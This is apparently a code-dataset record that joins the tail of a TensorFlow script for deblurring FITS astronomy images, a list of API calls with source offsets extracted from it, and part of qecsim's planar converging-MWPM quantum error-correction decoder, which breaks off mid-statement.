lvalue,summary,result=sess.run([loss,merged,pre], feed_dict={blur:Input_x,oril:Input_y}) test_writer.add_summary(summary, epoch) epoch_result[batch]=result.reshape(weight,height) epoch_result=toarray(epoch_result) recon=np.int16(epoch_result) testloss.append(lvalue) test_writer.close() if os.path.isfile(save_dir +'Test_'+name) is True: os.remove(save_dir+'Test_'+name) fits.HDUList([fits.PrimaryHDU(recon)]).writeto(save_dir+'Test_'+name) e=time.clock() print('Epoch %d mean train loss is %e, time is %f.'%(epoch,np.mean(trainloss),(e-s))) print('Epoch %d mean test loss is %e.'%(epoch,np.mean(testloss))) logger.info('Epoch %d mean train loss is %e, time is %f'%(epoch,np.mean(trainloss),(e-s))) logger.info('Epoch %d mean test loss is %e.'%(epoch,np.mean(testloss))) if os.path.isfile('residual/'+name) is True: os.remove('residual/'+name) original=toarray(original.reshape(num,weight,height)) fits.HDUList([fits.PrimaryHDU(original-recon)]).writeto('residual/'+name)
[ "tensorflow.nn.batch_normalization", "os.remove", "tensorflow.train.AdadeltaOptimizer", "numpy.floor", "tensorflow.reshape", "astropy.io.fits.PrimaryHDU", "logging.Formatter", "tensorflow.ConfigProto", "os.path.isfile", "tensorflow.Variable", "tensorflow.assign", "tensorflow.nn.conv2d", "tensorflow.layers.max_pooling2d", "glob.glob", "numpy.mean", "tensorflow.truncated_normal", "tensorflow.nn.moments", "tensorflow.layers.Input", "manager.GPUManager", "tensorflow.pad", "time.clock", "tensorflow.placeholder", "tensorflow.summary.FileWriter", "tensorflow.name_scope", "tensorflow.summary.merge_all", "tensorflow.summary.image", "tensorflow.control_dependencies", "tensorflow.summary.scalar", "tensorflow.train.Saver", "tensorflow.global_variables_initializer", "tensorflow.Session", "astropy.io.fits.open", "tensorflow.train.exponential_decay", "numpy.float32", "tensorflow.layers.dense", "numpy.zeros", "numpy.dtype", "tensorflow.square", "numpy.int16", "logging.handlers.RotatingFileHandler", "logging.getLogger", "numpy.sqrt" ]
[((659, 671), 'manager.GPUManager', 'GPUManager', ([], {}), '()\n', (669, 671), False, 'from manager import GPUManager\n'), ((991, 1083), 'logging.handlers.RotatingFileHandler', 'logging.handlers.RotatingFileHandler', (['LOG_FILE'], {'maxBytes': '(10 * 1024 * 1024)', 'backupCount': '(5)'}), '(LOG_FILE, maxBytes=10 * 1024 * 1024,\n backupCount=5)\n', (1027, 1083), False, 'import logging, logging.handlers\n'), ((1169, 1191), 'logging.Formatter', 'logging.Formatter', (['fmt'], {}), '(fmt)\n', (1186, 1191), False, 'import logging, logging.handlers\n'), ((1243, 1276), 'logging.getLogger', 'logging.getLogger', (['"""train_detail"""'], {}), "('train_detail')\n", (1260, 1276), False, 'import logging, logging.handlers\n'), ((6538, 6566), 'glob.glob', 'glob.glob', (['"""gauss127/*.fits"""'], {}), "('gauss127/*.fits')\n", (6547, 6566), False, 'import os, glob, time\n'), ((6800, 6833), 'tensorflow.global_variables_initializer', 'tf.global_variables_initializer', ([], {}), '()\n', (6831, 6833), True, 'import tensorflow as tf\n'), ((6844, 6860), 'tensorflow.ConfigProto', 'tf.ConfigProto', ([], {}), '()\n', (6858, 6860), True, 'import tensorflow as tf\n'), ((920, 944), 'os.path.isfile', 'os.path.isfile', (['LOG_FILE'], {}), '(LOG_FILE)\n', (934, 944), False, 'import os, glob, time\n'), ((958, 977), 'os.remove', 'os.remove', (['LOG_FILE'], {}), '(LOG_FILE)\n', (967, 977), False, 'import os, glob, time\n'), ((1746, 1782), 'tensorflow.pad', 'tf.pad', (['Input', 'paddings', '"""SYMMETRIC"""'], {}), "(Input, paddings, 'SYMMETRIC')\n", (1752, 1782), True, 'import tensorflow as tf\n'), ((4559, 4569), 'numpy.sqrt', 'np.sqrt', (['n'], {}), '(n)\n', (4566, 4569), True, 'import numpy as np\n'), ((4580, 4600), 'numpy.zeros', 'np.zeros', (['[n_w, n_h]'], {}), '([n_w, n_h])\n', (4588, 4600), True, 'import numpy as np\n'), ((4818, 4846), 'tensorflow.name_scope', 'tf.name_scope', (['"""Placeholder"""'], {}), "('Placeholder')\n", (4831, 4846), True, 'import tensorflow as tf\n'), ((4859, 4918), 'tensorflow.placeholder', 'tf.placeholder', (['tf.float32', '[1, 4096, 4096, 1]'], {'name': '"""Blur"""'}), "(tf.float32, [1, 4096, 4096, 1], name='Blur')\n", (4873, 4918), True, 'import tensorflow as tf\n'), ((4930, 4989), 'tensorflow.placeholder', 'tf.placeholder', (['tf.float32', '[1, 4096, 4096, 1]'], {'name': '"""Oril"""'}), "(tf.float32, [1, 4096, 4096, 1], name='Oril')\n", (4944, 4989), True, 'import tensorflow as tf\n'), ((5067, 5107), 'tensorflow.summary.image', 'tf.summary.image', (['"""Blur_input"""', 'blur', '(10)'], {}), "('Blur_input', blur, 10)\n", (5083, 5107), True, 'import tensorflow as tf\n'), ((5112, 5152), 'tensorflow.summary.image', 'tf.summary.image', (['"""Oril_input"""', 'oril', '(10)'], {}), "('Oril_input', oril, 10)\n", (5128, 5152), True, 'import tensorflow as tf\n'), ((5240, 5269), 'tensorflow.name_scope', 'tf.name_scope', (['"""Hidden_Layer"""'], {}), "('Hidden_Layer')\n", (5253, 5269), True, 'import tensorflow as tf\n'), ((6036, 6057), 'tensorflow.name_scope', 'tf.name_scope', (['"""Loss"""'], {}), "('Loss')\n", (6049, 6057), True, 'import tensorflow as tf\n'), ((6127, 6162), 'tensorflow.summary.image', 'tf.summary.image', (['"""Output"""', 'pre', '(10)'], {}), "('Output', pre, 10)\n", (6143, 6162), True, 'import tensorflow as tf\n'), ((6167, 6198), 'tensorflow.summary.scalar', 'tf.summary.scalar', (['"""loss"""', 'loss'], {}), "('loss', loss)\n", (6184, 6198), True, 'import tensorflow as tf\n'), ((6211, 6233), 'tensorflow.name_scope', 'tf.name_scope', (['"""Train"""'], {}), "('Train')\n", (6224, 6233), True, 'import tensorflow as tf\n'), ((6245, 6276), 'tensorflow.Variable', 'tf.Variable', (['(0)'], {'trainable': '(False)'}), '(0, trainable=False)\n', (6256, 6276), True, 'import tensorflow as tf\n'), ((6290, 6354), 'tensorflow.train.exponential_decay', 'tf.train.exponential_decay', (['(5.0)', 'step', '(100)', '(0.96)'], {'staircase': '(True)'}), '(5.0, step, 100, 0.96, staircase=True)\n', (6316, 6354), True, 'import tensorflow as tf\n'), ((6945, 6970), 'tensorflow.Session', 'tf.Session', ([], {'config': 'config'}), '(config=config)\n', (6955, 6970), True, 'import tensorflow as tf\n'), ((7014, 7036), 'tensorflow.summary.merge_all', 'tf.summary.merge_all', ([], {}), '()\n', (7034, 7036), True, 'import tensorflow as tf\n'), ((7056, 7108), 'tensorflow.summary.FileWriter', 'tf.summary.FileWriter', (["(log_dir + 'train')", 'sess.graph'], {}), "(log_dir + 'train', sess.graph)\n", (7077, 7108), True, 'import tensorflow as tf\n'), ((7127, 7178), 'tensorflow.summary.FileWriter', 'tf.summary.FileWriter', (["(log_dir + 'test')", 'sess.graph'], {}), "(log_dir + 'test', sess.graph)\n", (7148, 7178), True, 'import tensorflow as tf\n'), ((7191, 7222), 'tensorflow.train.Saver', 'tf.train.Saver', ([], {'max_to_keep': '(128)'}), '(max_to_keep=128)\n', (7205, 7222), True, 'import tensorflow as tf\n'), ((1518, 1545), 'numpy.floor', 'np.floor', (['(ker_size[0] / 2.0)'], {}), '(ker_size[0] / 2.0)\n', (1526, 1545), True, 'import numpy as np\n'), ((1601, 1628), 'numpy.floor', 'np.floor', (['(ker_size[1] / 2.0)'], {}), '(ker_size[1] / 2.0)\n', (1609, 1628), True, 'import numpy as np\n'), ((1869, 1888), 'tensorflow.name_scope', 'tf.name_scope', (['"""BN"""'], {}), "('BN')\n", (1882, 1888), True, 'import tensorflow as tf\n'), ((3001, 3037), 'tensorflow.name_scope', 'tf.name_scope', (['"""Convolutional_Layer"""'], {}), "('Convolutional_Layer')\n", (3014, 3037), True, 'import tensorflow as tf\n'), ((3099, 3129), 'tensorflow.layers.Input', 'tf.layers.Input', ([], {'tensor': 'padded'}), '(tensor=padded)\n', (3114, 3129), True, 'import tensorflow as tf\n'), ((4534, 4552), 'numpy.sqrt', 'np.sqrt', (['(n * w * h)'], {}), '(n * w * h)\n', (4541, 4552), True, 'import numpy as np\n'), ((5944, 5968), 'tensorflow.layers.dense', 'tf.layers.dense', (['cl10', '(1)'], {}), '(cl10, 1)\n', (5959, 5968), True, 'import tensorflow as tf\n'), ((6069, 6095), 'tensorflow.reshape', 'tf.reshape', (['dense', 'imgsize'], {}), '(dense, imgsize)\n', (6079, 6095), True, 'import tensorflow as tf\n'), ((7425, 7437), 'time.clock', 'time.clock', ([], {}), '()\n', (7435, 7437), False, 'import os, glob, time\n'), ((10362, 10374), 'time.clock', 'time.clock', ([], {}), '()\n', (10372, 10374), False, 'import os, glob, time\n'), ((2405, 2469), 'tensorflow.assign', 'tf.assign', (['pop_mean', '(pop_mean * decay + batch_mean * (1 - decay))'], {}), '(pop_mean, pop_mean * decay + batch_mean * (1 - decay))\n', (2414, 2469), True, 'import tensorflow as tf\n'), ((2485, 2546), 'tensorflow.assign', 'tf.assign', (['pop_var', '(pop_var * decay + batch_var * (1 - decay))'], {}), '(pop_var, pop_var * decay + batch_var * (1 - decay))\n', (2494, 2546), True, 'import tensorflow as tf\n'), ((2732, 2804), 'tensorflow.nn.batch_normalization', 'tf.nn.batch_normalization', (['input', 'pop_mean', 'pop_var', 'beta', 'scale', '(0.0001)'], {}), '(input, pop_mean, pop_var, beta, scale, 0.0001)\n', (2757, 2804), True, 'import tensorflow as tf\n'), ((3330, 3388), 'tensorflow.truncated_normal', 'tf.truncated_normal', (['[k_num]'], {'stddev': '(5.0)', 'dtype': 'tf.float32'}), '([k_num], stddev=5.0, dtype=tf.float32)\n', (3349, 3388), True, 'import tensorflow as tf\n'), ((3412, 3483), 'tensorflow.nn.conv2d', 'tf.nn.conv2d', (['raw_image', 'weights'], {'strides': '[1, 1, 1, 1]', 'padding': '"""VALID"""'}), "(raw_image, weights, strides=[1, 1, 1, 1], padding='VALID')\n", (3424, 3483), True, 'import tensorflow as tf\n'), ((3647, 3711), 'tensorflow.layers.max_pooling2d', 'tf.layers.max_pooling2d', (['Act', 'p_size'], {'strides': '(1)', 'padding': '"""valid"""'}), "(Act, p_size, strides=1, padding='valid')\n", (3670, 3711), True, 'import tensorflow as tf\n'), ((3756, 3821), 'tensorflow.layers.max_pooling2d', 'tf.layers.max_pooling2d', (['Conv', 'p_size'], {'strides': '(1)', 'padding': '"""valid"""'}), "(Conv, p_size, strides=1, padding='valid')\n", (3779, 3821), True, 'import tensorflow as tf\n'), ((4137, 4153), 'tensorflow.square', 'tf.square', (['(r - x)'], {}), '(r - x)\n', (4146, 4153), True, 'import tensorflow as tf\n'), ((4274, 4289), 'numpy.dtype', 'np.dtype', (['""">i2"""'], {}), "('>i2')\n", (4282, 4289), True, 'import numpy as np\n'), ((6374, 6411), 'tensorflow.train.AdadeltaOptimizer', 'tf.train.AdadeltaOptimizer', (['learnrate'], {}), '(learnrate)\n', (6400, 6411), True, 'import tensorflow as tf\n'), ((10734, 10768), 'os.path.isfile', 'os.path.isfile', (["('residual/' + name)"], {}), "('residual/' + name)\n", (10748, 10768), False, 'import os, glob, time\n'), ((10788, 10817), 'os.remove', 'os.remove', (["('residual/' + name)"], {}), "('residual/' + name)\n", (10797, 10817), False, 'import os, glob, time\n'), ((2256, 2287), 'tensorflow.nn.moments', 'tf.nn.moments', (['input', '[0, 1, 2]'], {}), '(input, [0, 1, 2])\n', (2269, 2287), True, 'import tensorflow as tf\n'), ((2342, 2367), 'tensorflow.nn.moments', 'tf.nn.moments', (['input', '[0]'], {}), '(input, [0])\n', (2355, 2367), True, 'import tensorflow as tf\n'), ((2555, 2603), 'tensorflow.control_dependencies', 'tf.control_dependencies', (['[train_mean, train_var]'], {}), '([train_mean, train_var])\n', (2578, 2603), True, 'import tensorflow as tf\n'), ((2627, 2703), 'tensorflow.nn.batch_normalization', 'tf.nn.batch_normalization', (['input', 'batch_mean', 'batch_var', 'beta', 'scale', '(0.0001)'], {}), '(input, batch_mean, batch_var, beta, scale, 0.0001)\n', (2652, 2703), True, 'import tensorflow as tf\n'), ((8006, 8037), 'numpy.zeros', 'np.zeros', (['[num, weight, height]'], {}), '([num, weight, height])\n', (8014, 8037), True, 'import numpy as np\n'), ((8871, 8893), 'numpy.int16', 'np.int16', (['epoch_result'], {}), '(epoch_result)\n', (8879, 8893), True, 'import numpy as np\n'), ((9237, 9268), 'numpy.zeros', 'np.zeros', (['[num, weight, height]'], {}), '([num, weight, height])\n', (9245, 9268), True, 'import numpy as np\n'), ((10039, 10061), 'numpy.int16', 'np.int16', (['epoch_result'], {}), '(epoch_result)\n', (10047, 10061), True, 'import numpy as np\n'), ((7530, 7559), 'astropy.io.fits.open', 'fits.open', (["('gauss127/' + name)"], {}), "('gauss127/' + name)\n", (7539, 7559), False, 'from astropy.io import fits\n'), ((7697, 7720), 'numpy.zeros', 'np.zeros', (['blurred.shape'], {}), '(blurred.shape)\n', (7705, 7720), True, 'import numpy as np\n'), ((8107, 8157), 'numpy.zeros', 'np.zeros', (['[1, weight, height, 1]'], {'dtype': 'np.float32'}), '([1, weight, height, 1], dtype=np.float32)\n', (8115, 8157), True, 'import numpy as np\n'), ((8182, 8232), 'numpy.zeros', 'np.zeros', (['[1, weight, height, 1]'], {'dtype': 'np.float32'}), '([1, weight, height, 1], dtype=np.float32)\n', (8190, 8232), True, 'import numpy as np\n'), ((8260, 8286), 'numpy.float32', 'np.float32', (['blurred[batch]'], {}), '(blurred[batch])\n', (8270, 8286), True, 'import numpy as np\n'), ((8318, 8345), 'numpy.float32', 'np.float32', (['original[batch]'], {}), '(original[batch])\n', (8328, 8345), True, 'import numpy as np\n'), ((9000, 9042), 'os.path.isfile', 'os.path.isfile', (["(save_dir + 'Train_' + name)"], {}), "(save_dir + 'Train_' + name)\n", (9014, 9042), False, 'import os, glob, time\n'), ((9068, 9105), 'os.remove', 'os.remove', (["(save_dir + 'Train_' + name)"], {}), "(save_dir + 'Train_' + name)\n", (9077, 9105), False, 'import os, glob, time\n'), ((9338, 9388), 'numpy.zeros', 'np.zeros', (['[1, weight, height, 1]'], {'dtype': 'np.float32'}), '([1, weight, height, 1], dtype=np.float32)\n', (9346, 9388), True, 'import numpy as np\n'), ((9413, 9463), 'numpy.zeros', 'np.zeros', (['[1, weight, height, 1]'], {'dtype': 'np.float32'}), '([1, weight, height, 1], dtype=np.float32)\n', (9421, 9463), True, 'import numpy as np\n'), ((9491, 9517), 'numpy.float32', 'np.float32', (['blurred[batch]'], {}), '(blurred[batch])\n', (9501, 9517), True, 'import numpy as np\n'), ((9549, 9576), 'numpy.float32', 'np.float32', (['original[batch]'], {}), '(original[batch])\n', (9559, 9576), True, 'import numpy as np\n'), ((10165, 10206), 'os.path.isfile', 'os.path.isfile', (["(save_dir + 'Test_' + name)"], {}), "(save_dir + 'Test_' + name)\n", (10179, 10206), False, 'import os, glob, time\n'), ((10233, 10269), 'os.remove', 'os.remove', (["(save_dir + 'Test_' + name)"], {}), "(save_dir + 'Test_' + name)\n", (10242, 10269), False, 'import os, glob, time\n'), ((10442, 10460), 'numpy.mean', 'np.mean', (['trainloss'], {}), '(trainloss)\n', (10449, 10460), True, 'import numpy as np\n'), ((10523, 10540), 'numpy.mean', 'np.mean', (['testloss'], {}), '(testloss)\n', (10530, 10540), True, 'import numpy as np\n'), ((10615, 10633), 'numpy.mean', 'np.mean', (['trainloss'], {}), '(trainloss)\n', (10622, 10633), True, 'import numpy as np\n'), ((10703, 10720), 'numpy.mean', 'np.mean', (['testloss'], {}), '(testloss)\n', (10710, 10720), True, 'import numpy as np\n'), ((7608, 7637), 'astropy.io.fits.open', 'fits.open', (["('original/' + name)"], {}), "('original/' + name)\n", (7617, 7637), False, 'from astropy.io import fits\n'), ((10900, 10933), 'astropy.io.fits.PrimaryHDU', 'fits.PrimaryHDU', (['(original - recon)'], {}), '(original - recon)\n', (10915, 10933), False, 'from astropy.io import fits\n'), ((9132, 9154), 'astropy.io.fits.PrimaryHDU', 'fits.PrimaryHDU', (['recon'], {}), '(recon)\n', (9147, 9154), False, 'from astropy.io import fits\n'), ((10296, 10318), 'astropy.io.fits.PrimaryHDU', 'fits.PrimaryHDU', (['recon'], {}), '(recon)\n', (10311, 10318), False, 'from astropy.io import fits\n')]
import functools import itertools import logging import operator import numpy as np from qecsim import graphtools as gt from qecsim.model import Decoder, cli_description logger = logging.getLogger(__name__) @cli_description('Converging MWPM ([factor] FLOAT >=0, ...)') class PlanarCMWPMDecoder(Decoder): """ Implements a planar Converging Minimum Weight Perfect Matching (CMWPM) decoder. Decoding algorithm: * Resolve syndrome plaquettes using: :meth:`qecsim.models.planar.PlanarCode.syndrome_to_plaquette_indices`. * Separate syndrome plaquettes into primal and dual plaquettes. * For max_iterations: * Resolve matched_primal_pairs using MWPM with edge weights between primal plaquettes given by the taxi-cab distance through a background grid determined by the previous_matched_dual_pairs. * Resolve matched_dual_pairs using MWPM with edge weights between dual plaquettes given by the taxi-cab distance through a background grid determined by the previous_matched_primal_pairs. * Stop if matched_primal_pairs = previous_matched_primal_pairs and matched_dual_pairs = previous_matched_dual_pairs. * Return recovery operator by applying the shortest path between matching pairs using: :meth:`qecsim.models.planar.PlanarPauli.path`. Notes on background grid: * The grid is initialised with a grid factor (e.g. 3), box-shape (e.g. tight) and distance-algorithm (e.g. 1), and each edge is given an initial weight (e.g. 1). * The grid background is set such that, for each pair of syndrome indices (e.g. matched Z syndromes), all edges outside the chosen box-shape (see below), bounding the pair of indices, is multiplied by the grid factor. * The distance between any two syndrome indices (e.g. unmatched X syndromes) is weighted by the taxi-cab path through the background according to the chosen distance algorithm (see below). * A minimum-weight perfect matching in a graph of syndrome indices (e.g. unmatched X syndromes) with edges weighted by distance through the background gives matched pairs (e.g. matched X syndromes) taking into account correlations with the background (e.g. matched Z syndromes). * Box shape defines area outside of which the background is multiplied by the grid factor: Tight:: X+ + + + + + + + + + + + + + + + +X Rounded:: + + X+ + + + + + + + + + + + + + + + + + +X + + Fitted:: + + + X+ + + + + + + + + + + + + + + + + + + + +X + + + Loose:: + + + + +X+ + + + + + + + + + + + + + + + + + + + +X+ + + + + * Distance algorithm defines how the path sum over the background of weighted edges is calculated: Alg. 1:: X+ + + | + + + + + + | + + + - - -X Alg. 2:: X+ + + X- - - | + + + + + + | min( + + + , + + + ) | + + + + + + | - - -X + + +X Alg. 4:: X+ + + X- - - X+ + + X- | + | + + + + + + | | + + + + + + + min( + + + , + + + , - - - , + | + ) | + + + + + + | + + + | + + + + - - -X + + +X + + +X + - -X """ def __init__(self, factor=3, max_iterations=4, box_shape='t', distance_algorithm=4): """ Initialise new planar CMWPM decoder. :param factor: Multiplication factor. :type factor: int or float :param max_iterations: Maximum number of iterations. (default=4, 0=null, 1=MWPM, 2+=CMWPM) :type max_iterations: int :param box_shape: Shape of background boxes. (default='t', 't'=tight, 'r'=rounded, 'f'=fitted, 'l'=loose) :type box_shape: str :param distance_algorithm: Distance algorithm. (default=4, 1=h+v, 2=min(h+v,v+h), 4=min(h+v,v+h,h+v+h,v+h+v) :type distance_algorithm: int :raises ValueError: if factor is not >= 0.0. :raises ValueError: if max_iterations is not >= 0. :raises ValueError: if box_shape not in ('t', 'r', 'f', 'l'). :raises ValueError: if distance_algorithm not in (1, 2, 4). :raises TypeError: if any parameter is of an invalid type. """ try: # paranoid checking for CLI. (operator.index ensures the parameter can be treated as an int) if not factor >= 0.0: raise ValueError('{} valid factor values are number >= 0.0'.format(type(self).__name__)) if not operator.index(max_iterations) >= 0: raise ValueError('{} valid max_iterations values are integer >= 0'.format(type(self).__name__)) if box_shape not in ('t', 'r', 'f', 'l'): raise ValueError("{} valid box_shape values are ('t', 'r', 'f', 'l')".format(type(self).__name__)) if distance_algorithm not in (1, 2, 4): raise ValueError('{} valid distance_algorithm values are (1, 2, 4)'.format(type(self).__name__)) except TypeError as ex: raise TypeError('{} invalid parameter type'.format(type(self).__name__)) from ex self._factor = factor self._max_iterations = max_iterations self._box_shape = box_shape self._distance_algorithm = distance_algorithm self._debug_iterations = False @classmethod def _recovery_pauli(cls, code, *match_sets): # prepare recovery recovery_pauli = code.new_pauli() for matches in match_sets: # apply paths for a_index, b_index in matches: # add path to recover recovery_pauli.path(a_index, b_index) return recovery_pauli def decode(self, code, syndrome, **kwargs): """See :meth:`qecsim.model.Decoder.decode`""" # get syndrome indices syndrome_indices = code.syndrome_to_plaquette_indices(syndrome) # split indices into primal and dual primal_indices = frozenset(i for i in syndrome_indices if code.is_primal(i)) dual_indices = frozenset(i for i in syndrome_indices if code.is_dual(i)) # converge on matching grid = self.StepGrid(code) # prepare previous and current matches (in case max_iterations is 0) previous_primal_matches = primal_matches = frozenset() previous_dual_matches = dual_matches = frozenset() # Catch and log floating point errors. This may happen if factor is large/small and there are many matches. with np.errstate(all='raise'): try: for _ in range(self._max_iterations): primal_matches = grid.mwpm(previous_dual_matches, primal_indices, factor=self._factor, box_shape=self._box_shape, distance_algorithm=self._distance_algorithm) dual_matches = grid.mwpm(previous_primal_matches, dual_indices, factor=self._factor, box_shape=self._box_shape, distance_algorithm=self._distance_algorithm) if primal_matches == previous_primal_matches and dual_matches == previous_dual_matches: break previous_primal_matches = primal_matches previous_dual_matches = dual_matches except FloatingPointError as fpe: logger.warning('FPE RAISED FloatingPointError: {}'.format(fpe)) # prepare recovery recovery_pauli = self._recovery_pauli(code, primal_matches, dual_matches) # return recover as bsf return recovery_pauli.to_bsf() @property def label(self): """See :meth:`qecsim.model.Decoder.label`""" params = [('factor', self._factor), ('max_iterations', self._max_iterations), ('box_shape', self._box_shape), ('distance_algorithm', self._distance_algorithm), ] return 'Planar CMWPM ({})'.format(', '.join('{}={}'.format(k, v) for k, v in params if v)) def __repr__(self): return '{}({!r}, {!r}, {!r}, {!r})'.format( type(self).__name__, self._factor, self._max_iterations, self._box_shape, self._distance_algorithm, ) class StepGrid: """ Grid providing a weighted background for MWPM. Methods: * Set background weights based on matched index pairs: :meth:`set_background`. * Resolve taxi-cab distance, weighted by the background, between a pair of indices: :meth:`distance`. * Minimum weight perfect matching in a graph of indices where sites are weighted based on distance through the background: :meth:`mwpm`. """ def __init__(self, code): """ Initialise new step grid. :param code: Planar code. :type code: PlanarCode """ self._code = code # NOTE: size is bounds +3 (+1 because bounds is inclusive, +2 for border to include virtual indices) # NOTE: we use dtype=float because we get overflow to negative with int64 at 3^40. self._grid = np.zeros((code.bounds[0] + 3, code.bounds[1] + 3), dtype=float) self.set_background() def set_background(self, matched_indices=None, factor=3, initial=1, box_shape='t'): """ Set grid background from matched syndrome indices. Note: * The grid is initialised with initial value at all sites and zero elsewhere. * For each matched pair of syndrome indices, all sites outside the box-shape, bounding the pair of indices, are multiplied by factor. :param matched_indices: Matched pairs of syndrome indices. :type matched_indices: set of 2-tuples of 2-tuple of int :param factor: Multiplication factor. (default=3) :type factor: int or float :param initial: Initial edge weight. (default=1) :type initial: int or float :param box_shape: Shape of background boxes. (default='t', 't'=tight, 'r'=rounded, 'f'=fitted, 'l'=loose) :type box_shape: str """ assert box_shape in ('t', 'r', 'f', 'l'), 'StepGrid: Unsupported box shape' self._grid.fill(0) self._grid[::2, ::2] = initial self._grid[1::2, 1::2] = initial if matched_indices: for src_i, tgt_i in matched_indices: # if both indices virtual then skip if not (self._code.is_in_bounds(src_i) or self._code.is_in_bounds(tgt_i)): continue # multiply all elements outside box defined by syndrome indices if box_shape == 'r': self._box_rounded(src_i, tgt_i, factor) elif box_shape == 'f': self._box_fitted(src_i, tgt_i, factor) elif box_shape == 'l': self._box_loose(src_i, tgt_i, factor) else: self._box_tight(src_i, tgt_i, factor) @classmethod def _syndrome_to_grid_index(cls, *syndrome_indices): """ Convert given syndrome indices to grid indices allowing for border of virtual indices around grid. :param syndrome_indices: Any number of syndrome indices. :type syndrome_indices: 2-tuples of int :return: Grid indices :rtype: 2-tuples of int """ return tuple((syndrome_index[0] + 1, syndrome_index[1] + 1) for syndrome_index in syndrome_indices) @classmethod def _box_corners(cls, *indices): """ Top-left and bottom-right corners of box that bounds the given indices. :param indices: Any number of indices. :type indices: 2-tuples of int :return: Top-left and bottom-right indices. :rtype: 2-tuple of 2-tuple of int """ min_r = min(indices, key=lambda i: i[0])[0] max_r = max(indices, key=lambda i: i[0])[0] min_c = min(indices, key=lambda i: i[1])[1] max_c = max(indices, key=lambda i: i[1])[1] return (min_r, min_c), (max_r, max_c) def _multiply_box(self, top_left_i, bottom_right_i, factor): """ Multiply all sites inside box with given corner indices (boundary sites are multiplied). :param top_left_i: Top-left grid index. :type top_left_i: 2-tuple of int :param bottom_right_i: Bottom-right grid index. :type bottom_right_i: 2-tuple of int :param factor: Multiplication factor. :type factor: int or float """ min_r = max(0, top_left_i[0]) max_r = min(self._grid.shape[0] - 1, bottom_right_i[0]) min_c = max(0, top_left_i[1]) max_c = min(self._grid.shape[1] - 1, bottom_right_i[1]) self._grid[min_r:max_r + 1, min_c:max_c + 1] *= factor def _multiply_box_complement(self, top_left_i, bottom_right_i, factor): """ Multiply all sites outside box with given corner indices (boundary sites are not multiplied). :param top_left_i: Top-left grid index. :type top_left_i: 2-tuple of int :param bottom_right_i: Bottom-right grid index. :type bottom_right_i: 2-tuple of int :param factor: Multiplication factor. :type factor: int or float """ min_r = max(0, top_left_i[0]) max_r = min(self._grid.shape[0] - 1, bottom_right_i[0]) min_c = max(0, top_left_i[1]) max_c = min(self._grid.shape[1] - 1, bottom_right_i[1]) # top rows self._grid[:min_r] *= factor # bottom rows self._grid[max_r + 1:] *= factor # left cols (between top and bottom rows) self._grid[min_r:max_r + 1, :min_c] *= factor # right cols (between top and bottom rows) self._grid[min_r:max_r + 1, max_c + 1:] *= factor def _box_tight(self, src_i, tgt_i, factor): """ Multiply all sites outside tight-box. :param src_i: Source syndrome index. :type src_i: 2-tuple of int :param tgt_i: Target syndrome index. :type tgt_i: 2-tuple of int :param factor: Multiplication factor. :type factor: int or float """ src_i, tgt_i = self._syndrome_to_grid_index(src_i, tgt_i) # grid indices min_i, max_i = self._box_corners(src_i, tgt_i) # box corners # tight box self._multiply_box_complement(min_i, max_i, factor) def _box_rounded(self, src_i, tgt_i, factor): """ Multiply all sites outside loose-box with rounded corners. :param src_i: Source syndrome index. :type src_i: 2-tuple of int :param tgt_i: Target syndrome index. :type tgt_i: 2-tuple of int :param factor: Multiplication factor. :type factor: int or float """ src_i, tgt_i = self._syndrome_to_grid_index(src_i, tgt_i) # grid indices (min_r, min_c), (max_r, max_c) = self._box_corners(src_i, tgt_i) # box corners # loose box self._multiply_box_complement((min_r - 1, min_c - 1), (max_r + 1, max_c + 1), factor) # rounded corners if min_r == max_r: # syndromes on same row self._multiply_box((min_r - 1, min_c - 1), (max_r + 1, min_c), factor) # left self._multiply_box((min_r - 1, max_c), (max_r + 1, max_c + 1), factor) # right elif min_c == max_c: # syndromes on same column self._multiply_box((min_r - 1, min_c - 1), (min_r, max_c + 1), factor) # top self._multiply_box((max_r, min_c - 1), (max_r + 1, max_c + 1), factor) # bottom else: # syndromes in corners of box self._multiply_box((min_r - 1, min_c - 1), (min_r, min_c), factor) # top-left self._multiply_box((max_r, max_c), (max_r + 1, max_c + 1), factor) # bottom-right self._multiply_box((min_r - 1, max_c), (min_r, max_c + 1), factor) # top-right self._multiply_box((max_r, min_c - 1), (max_r + 1, min_c), factor) # bottom-left def _box_fitted(self, src_i, tgt_i, factor): """ Multiply all sites outside loose-box with rounded corners adjacent to syndrome indices. :param src_i: Source syndrome index. :type src_i: 2-tuple of int :param tgt_i: Target syndrome index. :type tgt_i: 2-tuple of int :param factor: Multiplication factor. :type factor: int or float """ src_i, tgt_i = self._syndrome_to_grid_index(src_i, tgt_i) # grid indices (min_r, min_c), (max_r, max_c) = self._box_corners(src_i, tgt_i) # box corners # loose box self._multiply_box_complement((min_r - 1, min_c - 1), (max_r + 1, max_c + 1), factor) # rounded corners (adjacent to syndrome indices only) if min_r == max_r: # syndromes on same row self._multiply_box((min_r - 1, min_c - 1), (max_r + 1, min_c), factor) # left self._multiply_box((min_r - 1, max_c), (max_r + 1, max_c + 1), factor) # right elif min_c == max_c: # syndromes on same column self._multiply_box((min_r - 1, min_c - 1), (min_r, max_c + 1), factor) # top self._multiply_box((max_r, min_c - 1), (max_r + 1, max_c + 1), factor) # bottom elif min(src_i, tgt_i) == (min_r, min_c): # syndromes top-left and bottom-right self._multiply_box((min_r - 1, min_c - 1), (min_r, min_c), factor) # top-left self._multiply_box((max_r, max_c), (max_r + 1, max_c + 1), factor) # bottom-right else: # syndromes top-right and bottom-left self._multiply_box((min_r - 1, max_c), (min_r, max_c + 1), factor) # top-right self._multiply_box((max_r, min_c - 1), (max_r + 1, min_c), factor) # bottom-left def _box_loose(self, src_i, tgt_i, factor): """ Multiply all sites outside loose-box. :param src_i: Source syndrome index. :type src_i: 2-tuple of int :param tgt_i: Target syndrome index. :type tgt_i: 2-tuple of int :param factor: Multiplication factor. :type factor: int or float """ src_i, tgt_i = self._syndrome_to_grid_index(src_i, tgt_i) # grid indices (min_r, min_c), (max_r, max_c) = self._box_corners(src_i, tgt_i) # box corners # loose box self._multiply_box_complement((min_r - 1, min_c - 1), (max_r + 1, max_c + 1), factor) def distance(self, src_i, tgt_i, algorithm=4): """ Distance between syndrome indices weighted by the grid background. Note: * The distance algorithm defines the path(s) used to calculate distance between syndrome indices. :param src_i: Source syndrome index. :type src_i: 2-tuple of int :param tgt_i: Target syndrome index. :type tgt_i: 2-tuple of int :param algorithm: Distance algorithm. (default=4, 1=v+h, 2=min(v+h,h+v), 4=min(v+h,h+v,v+h+v,h+v+h) :type algorithm: int :return: Distance. :rtype: float """ assert algorithm in 